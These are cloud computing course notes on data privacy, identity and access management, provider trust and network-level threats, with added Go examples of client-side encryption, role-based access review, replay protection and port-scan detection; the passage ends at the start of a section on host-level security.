Source: gecnilokheri.ac.in/GPContent/Unit-IV Cloud computing 8th …

Unit IV Cloud Computing

1. Data Privacy & Security in Cloud Computing

Cloud technology has given many businesses the opportunity to showcase their potential. SMEs not only get a chance to grow, they can also take their operations to the next level. Cloud technology has opened a door for small and medium-sized companies to win market share by entering the territory of bigger players. As business requirements have become on-demand and need-based, the cloud gives many companies a significant edge and allows them to compete in a much larger business space.

Cloud technology provides a range of advantages: data management, data storage, high availability with minimal downtime, CRM management, resource optimization and even end-to-end business automation. It also reduces up-front capital investment and saves a great deal of time.

At the same time, cloud computing has raised eyebrows in IT management, especially when it comes to data security. Data security and privacy protection are the two major factors, and they are becoming more important for the future development of cloud computing in business, industry and government. Addressing this fear, Google has claimed that data stored in the cloud is much safer.

What are the Challenges?

Data Replication

Every business faces this challenge. Snapshots and backups are taken daily and are stored automatically in the cloud. Do you know where they are stored and who can see and access them? Can you identify and control unauthorised copying of your data?

Data Loss

Data loss can be a disaster for any business. Data in virtual environments can easily be lost or exposed as it moves between VMs or into the cloud. Are you sure that only authorised users access your data, and within predefined policies? Do you have the authority to block any user who violates data use policies?

New Class of Users

Cloud computing needs cooperation between security, storage and application admins, all of whom handle your sensitive business data. The more privileged users there are, the greater the risk: if one admin's account is compromised or misused, all data in the system is at risk.

Insecure APIs

Application Programming Interfaces (APIs) let users customise and automate their use of the cloud, and they give developers the tools to integrate their applications with other software. Because APIs are exposed over the network, they are also an attack surface: how vulnerable an API is depends on how it authenticates callers and how the communication between applications is protected. While APIs help developers and businesses, they also raise serious security concerns.

Internal Threat

Never overlook this point. You may think data is safe inside the organisation, but insiders are one of the biggest challenges companies face. Employees can use their legitimate access to an organisation's cloud-based services to misuse or exfiltrate information such as financial records and customer details.

How to Protect your Data?

You can protect your business data in the cloud from unauthorised access. All it takes is a sharp eye and some extra effort. Here are a few practical tips to keep your cloud data safe and secure.

Always keep backup locally

When it comes to business data, you have to be extra careful. Always have a backup of your data, and keep at least one copy outside the primary cloud account so that you can still reach it if the original is lost or the provider is unavailable. A second, separate cloud account can hold the backup copies. Another option is an external storage device such as a hard disk or a thumb drive; that copy remains accessible even without an internet connection.

Don’t store sensitive data

Technology is changing, and businesses change with it. Data plays an important role in business today, so data privacy is one of the primary concerns of any business. If something is on the internet, it is hard to trust that it is safe, so avoid storing the most sensitive files or information in the cloud. Identity theft is on the rise and you cannot take the risk. Keep in the cloud the files you access frequently, and avoid putting there financial details, competitor details, client details and contact details such as phone numbers and addresses. If you must keep such files in the cloud, encrypt them before uploading.

Data encryption

One of the best ways to protect data in cloud storage is encryption. It is effective because the data must be decrypted before it can be read, which protects it from the service provider and from other users alike. For additional protection, make sure the data is also encrypted in transit during upload and download (for example over HTTPS/TLS). Client-side encryption does make sharing and synchronisation in the cloud platform a little slower.

Encrypted cloud service

A few cloud services provide local (client-side) encryption and decryption of your files in addition to storage and backup. The service encrypts your files on your device and stores only the ciphertext in the cloud, so nobody, including the service provider and its administrators, can read your files. Many free and trial versions are available; you can use them to learn how the service works and upgrade later for more space.
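As an added example (not code from the original notes), the following Go program shows what client-side encryption means in practice for both of the two tips above: the file is sealed with AES-256-GCM under a key that stays on the client, only the ciphertext reaches the cloud bucket (simulated here as an in-memory map), and any tampering with the stored blob, or moving the blob to another object name, is detected on download. The bucket type, the object names and the sample file contents are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// bucket stands in for the provider's object store (constructed for the
// example): the provider only ever sees what is put in here.
type bucket map[string][]byte

// newKey returns a random 256-bit key. In a real deployment the key is
// generated and kept on the client side and is never uploaded.
func newKey() ([]byte, error) {
	key := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, key); err != nil {
		return nil, err
	}
	return key, nil
}

// encryptBlob seals plaintext with AES-256-GCM. Output layout is
// nonce || ciphertext || tag. The object name is bound as additional
// authenticated data, so a blob copied under another name fails to open.
func encryptBlob(key []byte, name string, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, []byte(name)), nil
}

// decryptBlob reverses encryptBlob; GCM's tag check makes any modification
// of the stored blob (or a mismatched name) return an error.
func decryptBlob(key []byte, name string, blob []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, errors.New("blob too short to contain a nonce")
	}
	nonce, ciphertext := blob[:gcm.NonceSize()], blob[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ciphertext, []byte(name))
}

// upload encrypts locally, then stores only the ciphertext.
func upload(b bucket, key []byte, name string, data []byte) error {
	blob, err := encryptBlob(key, name, data)
	if err != nil {
		return err
	}
	b[name] = blob
	return nil
}

// download fetches the ciphertext and decrypts it locally.
func download(b bucket, key []byte, name string) ([]byte, error) {
	blob, ok := b[name]
	if !ok {
		return nil, errors.New("no such object")
	}
	return decryptBlob(key, name, blob)
}

func main() {
	key, _ := newKey()
	store := bucket{}
	secret := []byte("account,balance\n4711,100.00\n") // constructed sample file
	if err := upload(store, key, "ledger.csv", secret); err != nil {
		panic(err)
	}
	fmt.Println("provider sees plaintext:", bytes.Contains(store["ledger.csv"], []byte("balance")))
	plain, err := download(store, key, "ledger.csv")
	fmt.Printf("download ok: %v, matches: %v\n", err == nil, bytes.Equal(plain, secret))
	store["ledger.csv"][len(store["ledger.csv"])-1] ^= 0x01 // provider-side tampering
	_, err = download(store, key, "ledger.csv")
	fmt.Println("tampered download rejected:", err != nil)
}
```

The point of binding the object name as associated data is that a malicious or compromised provider cannot serve you a valid but wrong file (an old backup, or another object) in place of the one you asked for; the ciphertext alone gives the provider nothing to read.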

Using password

The first step is a strong password that can withstand guessing and cracking attempts; there are plenty of guides online on how to create one. Change your password regularly and never reuse the same password across accounts or folders. Opt for 2-step verification if your cloud service offers it. Google Drive, for example, offers 2-step verification consisting of the password plus a code sent to the registered phone number. This added layer makes your data much safer.

Keep an eye on what you do online

The security of your cloud data depends largely on your online behaviour. When using a public computer, never save your password and always make sure you log out properly. Another major concern is accessing cloud data over unsecured or open Wi-Fi hotspots: such connections are unencrypted, so attackers can easily intercept your traffic. Never post your password in any public forum or on social media, and change your Wi-Fi password regularly.

Anti-virus is a must

Sometimes the weakest link is the computer or device you use to access cloud data, so it needs proper protection. If the device is infected with malware, attackers can access your system, and with it your cloud data, easily. Choose an effective, well-maintained anti-virus product for the system, keep it up to date, and keep the device itself secured so that an attacker cannot get hold of your information through it.

Read your user agreement

If you are new to cloud computing and unsure which cloud storage to choose or how it really works, read the user agreement of the service you are about to sign up for. It can be hard going and will test your patience, but it is necessary. User agreements carry essential information that helps you understand the service in detail.

Access limitation

Give access only to users who really need it. Internal users and third-party vendors should get access only to the files they need to do their jobs. Where files are encrypted, distribute decryption keys on the same need-to-know basis. Evaluate users and vendors regularly and add or remove access as requirements change.

Platform, control & service monitoring

Platform, control and service monitoring is usually presented as a dashboard that shows the operational status of the monitored platform at any time. Each monitored element provides a status indicator, which helps determine which elements are performing according to the established standards. By identifying problems early, you can take defensive action to prevent loss of data or service.

Continuous system updating

Cloud data security is strengthened by regular patching and upgrading of systems and application software in the cloud platform. New patches, updates and service packs for the operating system are required to maintain a high security level and to support new versions of installed products. You have to be committed to tracking new software versions and security advisories, and to closing the security gaps that appear in installed systems and applications.

Legal & regulatory challenges

Cloud services give you the best solutions for your business problems only when you are assured that your data and your customers' data are private and secure; this should be the primary focus for cloud service providers. There are many legal and regulatory challenges to address when data moves from one country to another.

Multinational Framework on privacy and security :

Uncertainty about the legal and regulatory obligations related to data grows as more data moves to the cloud. To ensure that every business and country gets the full advantage of cloud computing, countries have to cooperate to develop a multinational framework on data privacy and security in the cloud, because as cloud computing evolves, data flows from one country to another. For example, data may be created in India using software hosted in the UK, stored in the US and used by staff based in Australia. The cloud provider needs to coordinate this entire process to make sure the data flow is smooth and safe.

Rules on Cross-border data transfers :

To improve the efficiency and security of cloud solutions and deliver results quickly, cloud service providers must be able to operate data centres in multiple locations and transfer data freely between them. Smooth data flow lets providers optimise their service and deliver the best business solutions. However, restrictions on cross-border data transfers create uncertainty if the rules or the legal framework are unclear or are not followed.

Conflicting legal obligations :

Different governments have different policies on data flows in their country, and cloud providers will be in legal trouble if they do not follow the applicable cyber laws. Divergent rules on privacy, data retention, law enforcement access and other issues lead to ambiguity. For example, one country's rules on cloud data storage might directly conflict with those of another country or with a particular service provider's practices.

To protect data in the cloud platform, keep all of the above in mind.

2. Identity and access management (IAM)

Identity and access management (IAM) is a framework of business processes, policies and technologies that facilitates the management of electronic or digital identities. With an IAM framework in place, information technology (IT) managers can control user access to critical information within their organizations. Identity and access management products offer role-based access control, which lets system administrators regulate access to systems or networks based on the roles of individual users within the enterprise.

In this context, access is the ability of an individual user to perform a specific task, such as view, create or modify a file. Roles are defined according to job competency, authority and responsibility within the enterprise.

Systems used for identity and access management include single sign-on systems, multi-factor authentication and privileged access management (PAM). These technologies also provide the ability to securely store identity and profile data as well as data governance functions to ensure that only data that is necessary and relevant is shared. IAM systems can be deployed on premises, provided by a third-party vendor through a cloud-based subscription model or deployed in a hybrid cloud.

Basic components of IAM

On a fundamental level, IAM encompasses the following components:

· How individuals are identified in a system.

· How roles are identified in a system and how they are assigned to individuals.

· Adding, removing and updating individuals and their roles in a system.

· Assigning levels of access to individuals or groups of individuals.

· Protecting the sensitive data within the system and securing the system itself.

What IAM systems should include

Identity access management systems should consist of all the necessary controls and tools to capture and record user login information, manage the enterprise database of user identities and orchestrate the assignment and removal of access privileges. That means that systems used for IAM should provide a centralized directory service with oversight as well as visibility into all aspects of the company user base.

Technologies for identity access and management should simplify the user provisioning and account setup process. These systems should reduce the time it takes to complete these processes with a controlled workflow that decreases errors as well as the potential for abuse while allowing automated account fulfillment. An identity and access management system should also allow administrators to instantly view and change access rights.

These systems also need to balance the speed and automation of their processes with the control that administrators need to monitor and modify access rights. Consequently, to manage access requests, the central directory needs an access rights system that automatically matches employee job titles, business unit identifiers and locations to their relevant privilege levels.

Multiple review levels can be included as workflows to enable the proper checking of individual requests. This simplifies setting up appropriate review processes for higher-level access as well as easing reviews of existing rights to prevent privilege creep, the gradual accumulation of access rights beyond what users need to do their jobs.

IAM systems should be used to provide flexibility to establish groups with specific privileges for specific roles so that access rights based on employee job functions can be uniformly assigned. The system should also provide request and approval processes for modifying privileges because employees with the same title and job location may need customized, or slightly different, access.
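To make the role model in this section concrete, here is an added Go example (not from the original notes) of a minimal IAM directory: permissions are attached to roles, users hold roles, access is denied by default, an unknown role cannot be granted, a leaver is deprovisioned in one step, and a review function lists the direct grants a user holds beyond what their roles justify, which is exactly the privilege creep described above. The role names, users and permissions are constructed sample data.

```go
package main

import (
	"fmt"
	"sort"
)

// Permission is an action on a resource, e.g. "read:invoices".
type Permission string

// Role bundles the permissions a job function needs.
type Role struct {
	Name  string
	Perms map[Permission]bool
}

// User holds roles plus any permissions granted directly, outside a role.
// Direct grants are where privilege creep usually accumulates.
type User struct {
	Name   string
	Roles  []string
	Direct map[Permission]bool
}

// Directory is the central store an IAM system keeps of roles and users.
type Directory struct {
	Roles map[string]Role
	Users map[string]User
}

// Allowed is deny-by-default: a request passes only if one of the user's
// roles, or a direct grant, carries exactly the requested permission.
func (d Directory) Allowed(user string, p Permission) bool {
	u, ok := d.Users[user]
	if !ok {
		return false // unknown or deprovisioned principal
	}
	for _, r := range u.Roles {
		if d.Roles[r].Perms[p] { // a missing role yields a nil map, i.e. false
			return true
		}
	}
	return u.Direct[p]
}

// Assign grants a user an existing role; unknown roles are refused.
func (d Directory) Assign(user, role string) error {
	u, ok := d.Users[user]
	if !ok {
		return fmt.Errorf("no such user %q", user)
	}
	if _, ok := d.Roles[role]; !ok {
		return fmt.Errorf("no such role %q", role)
	}
	u.Roles = append(u.Roles, role)
	d.Users[user] = u
	return nil
}

// Deprovision removes a principal completely, so every later check is denied.
func (d Directory) Deprovision(user string) {
	delete(d.Users, user)
}

// PrivilegeCreep returns the direct grants a user holds that none of their
// roles justify, sorted so the report is stable. An access review flags these.
func (d Directory) PrivilegeCreep(user string) []Permission {
	u := d.Users[user]
	creep := []Permission{}
	for p := range u.Direct {
		justified := false
		for _, r := range u.Roles {
			if d.Roles[r].Perms[p] {
				justified = true
				break
			}
		}
		if !justified {
			creep = append(creep, p)
		}
	}
	sort.Slice(creep, func(i, j int) bool { return creep[i] < creep[j] })
	return creep
}

// sampleDirectory builds the constructed sample data for the example.
func sampleDirectory() Directory {
	perms := func(ps ...Permission) map[Permission]bool {
		m := map[Permission]bool{}
		for _, p := range ps {
			m[p] = true
		}
		return m
	}
	return Directory{
		Roles: map[string]Role{
			"analyst":       {Name: "analyst", Perms: perms("read:invoices", "read:customers")},
			"finance-admin": {Name: "finance-admin", Perms: perms("read:invoices", "write:invoices", "approve:payments")},
		},
		Users: map[string]User{
			// alice was given approve:payments "temporarily" and it was never revoked
			"alice": {Name: "alice", Roles: []string{"analyst"}, Direct: perms("approve:payments")},
			"bob":   {Name: "bob", Roles: []string{"finance-admin"}},
		},
	}
}

func main() {
	d := sampleDirectory()
	fmt.Println("alice read:invoices  ->", d.Allowed("alice", "read:invoices"))
	fmt.Println("alice write:invoices ->", d.Allowed("alice", "write:invoices"))
	fmt.Println("alice creep          ->", d.PrivilegeCreep("alice"))
	d.Deprovision("bob")
	fmt.Println("bob after leaving    ->", d.Allowed("bob", "read:invoices"))
}
```

The review function is the part that matters operationally: a direct grant that a role later justifies drops out of the report, while one that no role explains stays on it until someone either revokes it or moves it into a role where it can be governed.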

Benefits of identity and access management

IAM technologies can be used to initiate, capture, record and manage user identities and their related access permissions in an automated manner. This brings an organization the following benefits:

· Access privileges are granted according to a single interpretation of policy, and all individuals and services are properly authenticated, authorized and audited.

· Companies that properly manage identities have greater control of user access, reducing the risk of internal and external data breaches.

· Automating IAM systems allows businesses to operate more efficiently by decreasing the effort, time and money that would be required to manage access to their networks manually.

· In terms of security, the use of an IAM framework can make it easier to enforce policies around user authentication, validation and privileges and address issues regarding privilege creep.

· IAM systems help companies better comply with government regulations by allowing them to show that corporate information is not being misused. Companies can also demonstrate that any data needed for auditing can be made available on-demand.

Additionally, by implementing identity access management tools and following related best practices, a company can gain a competitive edge. For example, IAM technologies allow the business to give users outside the organization, like customers, partners, contractors and suppliers, access to its network across mobile applications, on-premises apps and software-as-a-service apps without compromising security. This enables better collaboration, enhanced productivity, increased efficiency and reduced operating costs.

3. Risks associated with IAM

Implementing proper identity and access management tools or platforms means storing all authorizations and credentials in one, unified place. When not secured correctly, this can be a huge risk because if an attacker gains access to the system, all digital identities can be compromised. Similarly, if a specific employee that is authorized to the system does not follow security or password best practices, all of the information could be easily leaked.

Another concern when adopting IAM is the difficulty of implementation. Legacy systems typically already have identity management functionality in place, so converting resources to a new system can be challenging, expensive and time-consuming. However, solutions that minimise the need for technical support, such as cloud services, are becoming more viable.

4. Trust in cloud computing

Trust issues become particularly important when data processing is decentralised across geographically dispersed data centres and resources are distributed beyond a definable and controllable perimeter, which is especially true in cloud computing. The following section illustrates the importance of trust establishment in cloud computing, in particular establishing trust in cloud providers (CPs).

Current trends for trust establishment

There are ad hoc approaches to support consumers (cloud customers, CCs) in selecting trustworthy or dependable CPs. They can be classified and briefly analysed as follows.

·  SLAs: In practice, one way to establish trust in CPs is the fulfilment of SLAs. SLA validation and monitoring schemes quantify what exactly a CP is offering and which assurances are actually met. In cloud computing environments, customers are responsible for monitoring SLA violations and informing the provider in order to claim compensation. The compensation clauses are written by the CPs in such a way that the customer's only remedy for a violation is to apply for compensation (e.g., service credits). This problem arises because there are no standardised SLAs for the stakeholders in the cloud computing marketplace. Although an industry-driven initiative is addressing the problem by establishing standardised SLAs, it is far from being implemented in practice.

·  Audits: CPs use different audit standards (e.g., SAS 70 Type II, FISMA, ISO 27001) to assure users about their services and platforms. For example, Google lists SAS 70 Type II and FISMA certification to assure users about the security and privacy measures taken for Google Apps. A SAS 70 Type II audit covers only operational controls (e.g., policies and procedures inside data centres) and relies on a highly specific set of goals and standards. Such audits are not sufficient to alleviate users' security concerns, and most CPs are not willing to share the audit reports, which also leads to a lack of transparency.

·  Measuring and ratings: A cloud marketplace, Cloud Commons, has been launched to support consumers in identifying dependable CPs. Providers are rated on the basis of a questionnaire filled in by current CCs. In future, Cloud Commons aims to combine consumer feedback with technical measurements to assess and compare the trustworthiness of CPs. There is also a commercial cloud marketplace named SpotCloud that provides a platform where CCs can choose among potential providers in terms of cost, quality and location. Here the CPs' ratings are given in an Amazon-like "star" interface with no documentation of how the ratings are computed.

·  Self-assessment questionnaires: The CSA proposed a detailed questionnaire for security control transparency of CPs, the CAIQ (Consensus Assessment Initiative Questionnaire). It provides a means of assessing the capabilities and competencies of CPs in terms of different attributes (e.g., compliance, information security, governance). However, the CSA metrics working group has not yet proposed a metric for evaluating CAIQ answers, which would be necessary for comparing potential CPs on the basis of the completed questionnaires stored in the STAR (Security, Trust and Assurance Registry). Furthermore, the information stored in the STAR repository can be checked against the CCM (Cloud Controls Matrix) to provide assurance of whether the services offered by a CP comply with industry-accepted security standards, audits, regulations and control frameworks.

5. Parameters of Cloud Infrastructure Security

· Network Security Control: The network has always been the backbone of enterprise infrastructure, whether on-premises or in the cloud. At the outset, it is critical to map requirements (in line with legal and regulatory norms), assessing the current state of network security and the proposed integrations. In virtual environments, orchestrating the set-up, segregating data, proactively protecting assets and fortifying cloud infrastructure against external attacks are recommended. The cloud provider deploys a set of default configurations, which must then be aligned with the specific security requirements of the enterprise, either by an internal IT team or by an expert, trusted partner organisation.

· Persona and Access Management: Cloud infrastructure combined with IoT can help enterprises reach new levels of productivity and innovation. However, this means that data will be accessed from many different devices, requiring different encryption mechanisms within and outside the enterprise. Hence IAM plays a big part in limiting access per individual persona and virtual machine role, on a need-to-know basis. Analysing existing cyber security controls, as well as application security controls for data privacy and protection, is crucial when deciding on the IAM approach. IAM features are also specific to each public cloud, so customising them for an enterprise's access needs may require a partner with expertise across the public cloud platforms in use.

· Endpoint Security: The weakest link for any enterprise is often the endpoint. Cloud infrastructure allows a virtually unlimited number of devices and interfaces to connect to a network, and every device has to be configured according to organisational security policies, with specific guidelines for IoT and BYOD. The targets of the security architecture therefore need to be planned carefully, covering IAM integration with the different endpoints, followed by security testing to reduce exposure. Other measures include regular VAPTs (vulnerability assessment and penetration tests) and deception tools such as IllusionBLACK, which activates a decoy whenever an attacker is detected.

· Governance and Risk Assessment (GRC): After the cloud security planning and design stage is complete, the environment should be stabilised. Implementations must be reviewed while security controls are continually monitored, and continuous observation of the cloud infrastructure should be embedded in the organisation's operational policies. This is achieved through detailed logs and regular audits, again tailored to the enterprise's cloud infrastructure.

Approach for Implementation: Considering the admittedly difficult shift from on-premises to cloud, enterprises need a prescriptive approach to cloud infrastructure security. The migration plan should include security compliance checks and gap analysis to ensure a safe transition and mitigate risks. Cloud security solutions should not be limited to a specific or predefined approach; instead, they can be aligned with enterprise requirements by:

• Individually defining the security architecture and migration approach to –

o     Define the actual scope of the work during setup

o     Ensure every aspect of cloud security is mapped perfectly

o     Offer a specific reference point to operations and governance teams

• Hosting and managing enterprise actions in close conjunction with the cloud service provider

• Adopting a define, discover, diagnose, detail, deliver methodology for regular assessments based on industry-recognised CSA and NIST standards

• Conducting periodic reviews using a robust security management toolkit

• Incorporating best practices as per NIST and CIS-compliance through a four-stage identify, analyze, define and implement, and stabilize process

This approach, considered holistically alongside SaaS, PaaS and IaaS-based security solutions, will help IT decision-makers ensure security for their cloud environment. Enterprises can then face risk with confidence, embrace innovation and maintain business continuity with minimal disruption during data migration to the cloud.

6. Level of security

The fundamental basis for developing a secure cloud environment is a set of security principles:

· Confidentiality: The prevention of unauthorized disclosure of information, whether intentional or unintentional.

· Integrity: Cloud information integrity rests on two principles: preventing modification of data by unauthorized users, and preventing unauthorized modification of data by authorized users.

· Availability: This Principle ensures the availability of cloud data and computing resources when needed.

· Authentication: The process of verifying a user's identity, ensuring that users are who they claim to be.

· Authorization: The privileges granted to an individual or process, enabling access only to the data and computing resources they are authorized for.

· Accountability: This is related to non-repudiation: a person cannot deny having performed an action. Accountability ties each action within the cloud system to the individual who performed it.

The top security threats in cloud computing are classified as network level, host level and application level.

6.1 Network level security issues

In a public cloud architecture, data moving to or from the organisation must be protected for confidentiality and integrity. Network level security risks are therefore classified into three types: ensuring data confidentiality, availability and integrity. Data and resources previously confined to a private network are now exposed to the internet, on a shared public network belonging to a third-party cloud provider. Using HTTP instead of HTTPS increases the risk further. The types of network level security issues are:

· Eavesdropping

An unauthorised party reads data by intercepting network traffic, resulting in a failure of confidentiality. The eavesdropper secretly listens to the private communications of others. The attack can be carried out against email, instant messaging and other traffic.

· Replay attack

A network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. The attacker intercepts and stores old messages and later resends them to one of the participants to gain access to unauthorised resources.
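The countermeasure against replay is freshness: each message carries a timestamp and a unique nonce under the MAC, and the receiver rejects anything outside its time window or carrying a nonce it has already accepted. The following Go program is an added example (not from the original notes) of that check, with the checks ordered so that a forged message can never fill the nonce cache; the shared key, the messages and the clock values are constructed for the example.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
	"strconv"
	"time"
)

// Message is what travels over the network. Everything except MAC is
// covered by the MAC, so an attacker can neither alter the body nor
// change the timestamp or nonce of a captured message.
type Message struct {
	Timestamp int64  // seconds since epoch, set by the sender
	Nonce     string // unique per message
	Body      string
	MAC       string // hex HMAC-SHA256 over timestamp|nonce|body
}

func (m Message) signedPart() string {
	return strconv.FormatInt(m.Timestamp, 10) + "|" + m.Nonce + "|" + m.Body
}

func mac(key []byte, data string) string {
	h := hmac.New(sha256.New, key)
	h.Write([]byte(data))
	return hex.EncodeToString(h.Sum(nil))
}

// NewNonce draws 16 random bytes; accidental collisions are negligible.
func NewNonce() (string, error) {
	b := make([]byte, 16)
	if _, err := io.ReadFull(rand.Reader, b); err != nil {
		return "", err
	}
	return hex.EncodeToString(b), nil
}

// Sign builds an authenticated message. Nonce and time are parameters so
// the example is deterministic; a real sender uses NewNonce and time.Now.
func Sign(key []byte, nonce string, ts int64, body string) Message {
	m := Message{Timestamp: ts, Nonce: nonce, Body: body}
	m.MAC = mac(key, m.signedPart())
	return m
}

var (
	ErrBadMAC = errors.New("mac verification failed")
	ErrStale  = errors.New("timestamp outside freshness window")
	ErrReplay = errors.New("nonce already seen")
)

// Receiver remembers accepted nonces for the length of its window.
type Receiver struct {
	key    []byte
	window int64            // seconds
	seen   map[string]int64 // nonce -> timestamp it was accepted with
}

func NewReceiver(key []byte, window time.Duration) *Receiver {
	return &Receiver{key: key, window: int64(window.Seconds()), seen: map[string]int64{}}
}

// Accept checks, in order: authenticity (so forged messages cannot fill the
// nonce cache), freshness, then uniqueness. now is the receiver's clock.
func (r *Receiver) Accept(m Message, now int64) error {
	expected := mac(r.key, m.signedPart())
	if !hmac.Equal([]byte(expected), []byte(m.MAC)) {
		return ErrBadMAC
	}
	if m.Timestamp < now-r.window || m.Timestamp > now+r.window {
		return ErrStale
	}
	if _, dup := r.seen[m.Nonce]; dup {
		return ErrReplay
	}
	r.seen[m.Nonce] = m.Timestamp
	// Nonces older than the window can be forgotten: a message carrying one
	// would already be rejected as stale, so the cache stays bounded.
	for n, ts := range r.seen {
		if ts < now-r.window {
			delete(r.seen, n)
		}
	}
	return nil
}

func main() {
	key := []byte("constructed shared secret")
	rx := NewReceiver(key, 30*time.Second)
	msg := Sign(key, "nonce-1", 1000, "transfer 100 to bob")
	fmt.Println("first delivery:", rx.Accept(msg, 1001))
	fmt.Println("replayed later:", rx.Accept(msg, 1010))
	msg.Body = "transfer 900 to bob"
	fmt.Println("tampered body: ", rx.Accept(msg, 1010))
}
```

The timestamp alone is not enough (a message can be replayed within the window) and the nonce alone is not enough (the cache would grow without bound and an old capture could be replayed after a restart); together they bound both the replay opportunity and the receiver's memory.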

· Sybil attack

A malicious user acquires multiple identities and pretends to be several distinct users, trying to build relationships with honest users. If the attacker succeeds in compromising one of the honest users, the attacker gains unauthorised privileges that assist the rest of the attack.

· Reused IP address

When a customer leaves the network, its IP address is reassigned to and reused by another customer, which creates a security risk for the new user. A customer cannot assume that network access to its resources is terminated upon release of its IP address: the old address may still be present in DNS caches, so traffic intended for the original user may reach the new holder of the address, violating the original user's privacy. IP addresses are a finite and billable asset. There is a similar lag between when physical (i.e., MAC) addresses change and when stale entries are cleared from ARP caches; an old address persists in ARP caches until they are cleared.

· DNS Attacks

DNS translates domain names to IP addresses, because domain names are easier to remember than addresses. If an attacker poisons or spoofs DNS responses, the user is routed to a different server than the one requested, and the traffic between sender and receiver is redirected through a malicious path. Even when DNS security measures are taken, the route chosen between sender and receiver can still cause security problems.

· BGP Prefix Hijacking

A network attack in which false announcements are made about the IP prefixes associated with an autonomous system (AS), so that malicious parties receive traffic for addresses they do not own and can act without being easily traced. ASes exchange routing information using the Border Gateway Protocol (BGP). A faulty or malicious AS announces prefixes that do not belong to it, and the actual traffic is routed to a different destination than the intended one.

· Sniffer Attack

Data flowing over the network can be read and captured by anyone who can observe it. A sniffer program uses the NIC (network interface card), typically in promiscuous mode, to record traffic addressed to other systems. A sniffing host on a network can be detected using ARP (Address Resolution Protocol) probes and RTT (round trip time) measurements.

· Port Scanning

If a customer configures a security group to allow traffic from any source (0.0.0.0/0) to a specific port, that port is visible to port scanners across the internet. When port scanning is detected, the scanning source should be blocked.
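A port scan against an exposed instance is easy to recognise in the provider's flow logs: one source touching many distinct destination ports within a short time. The following Go program is an added example (not from the original notes) of that detection logic run over sample log lines; the record format (time, source, destination, port, action) and the sample lines are constructed for the example and are not any particular provider's schema.

```go
package main

import (
	"fmt"
	"sort"
	"strconv"
	"strings"
	"time"
)

// flow is one parsed log record. The line format "RFC3339 src dst port action"
// is constructed for the example; real providers use their own schema.
type flow struct {
	at   time.Time
	src  string
	dst  string
	port int
}

func parseFlow(line string) (flow, error) {
	f := strings.Fields(line)
	if len(f) != 5 {
		return flow{}, fmt.Errorf("malformed line: %q", line)
	}
	at, err := time.Parse(time.RFC3339, f[0])
	if err != nil {
		return flow{}, err
	}
	port, err := strconv.Atoi(f[3])
	if err != nil || port < 1 || port > 65535 {
		return flow{}, fmt.Errorf("bad port in %q", line)
	}
	return flow{at: at, src: f[1], dst: f[2], port: port}, nil
}

// Finding reports a source that touched at least threshold distinct ports
// on one destination inside a single time window.
type Finding struct {
	Src   string
	Dst   string
	Ports []int
}

// DetectPortScans groups flows by (src, dst) and slides a window over each
// group's events in time order, keeping the largest set of distinct ports
// seen in any one window. Malformed lines are skipped rather than fatal.
func DetectPortScans(lines []string, threshold int, window time.Duration) []Finding {
	groups := map[[2]string][]flow{}
	for _, l := range lines {
		f, err := parseFlow(l)
		if err != nil {
			continue
		}
		k := [2]string{f.src, f.dst}
		groups[k] = append(groups[k], f)
	}
	var out []Finding
	for k, fs := range groups {
		sort.Slice(fs, func(i, j int) bool { return fs[i].at.Before(fs[j].at) })
		best := map[int]bool{}
		for i := range fs {
			ports := map[int]bool{}
			for j := i; j < len(fs) && fs[j].at.Sub(fs[i].at) < window; j++ {
				ports[fs[j].port] = true
			}
			if len(ports) > len(best) {
				best = ports
			}
		}
		if len(best) >= threshold {
			var ps []int
			for p := range best {
				ps = append(ps, p)
			}
			sort.Ints(ps)
			out = append(out, Finding{Src: k[0], Dst: k[1], Ports: ps})
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Src < out[j].Src })
	return out
}

// SampleFlowLog is constructed input: one scanner sweeping 12 ports in under
// a minute, one ordinary client hitting 443 repeatedly, and a garbage line.
func SampleFlowLog() []string {
	lines := []string{}
	scanPorts := []int{21, 22, 23, 25, 80, 110, 143, 443, 445, 3306, 3389, 8080}
	for i, p := range scanPorts {
		ts := time.Date(2024, 5, 1, 10, 0, i*3, 0, time.UTC).Format(time.RFC3339)
		lines = append(lines, fmt.Sprintf("%s 203.0.113.5 10.0.0.12 %d REJECT", ts, p))
	}
	for i := 0; i < 20; i++ {
		ts := time.Date(2024, 5, 1, 10, 0, i*2, 0, time.UTC).Format(time.RFC3339)
		lines = append(lines, fmt.Sprintf("%s 198.51.100.7 10.0.0.12 443 ACCEPT", ts))
	}
	return append(lines, "garbage line that should be skipped")
}

func main() {
	for _, f := range DetectPortScans(SampleFlowLog(), 8, time.Minute) {
		fmt.Printf("possible port scan from %s against %s: %d ports %v\n", f.Src, f.Dst, len(f.Ports), f.Ports)
	}
}
```

Counting distinct ports rather than raw connection attempts is what separates a scanner from a busy legitimate client: the client in the sample makes more connections than the scanner but always to the same port, so it never trips the rule.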

· Dos Attack

A DoS attack forces a system component to limit, or even halt, its normal services. The network is made unavailable by flooding, disrupting, jamming or crashing it. Denial of service on the internet is impossible to prevent entirely, but its impact can be reduced by firewalls and rate limiting, provided they are configured properly.

· Distributed Denial of Service Attack

A Distributed Denial of Service attack is a DoS attack that originates from more than one source and more than one location at the same time. DDoS attacks come from many compromised ("zombie") computers that flood the server simultaneously, which makes them harder to trace and lets the attacker use more bandwidth.

6.2 Host level security issues

Cloud service providers do not publicly share information about their host platforms, host operating systems and the processes in place to secure the hosts, since attackers could use it to intrude into the cloud service. The host level security issues are:

· Security concerns with the hypervisor

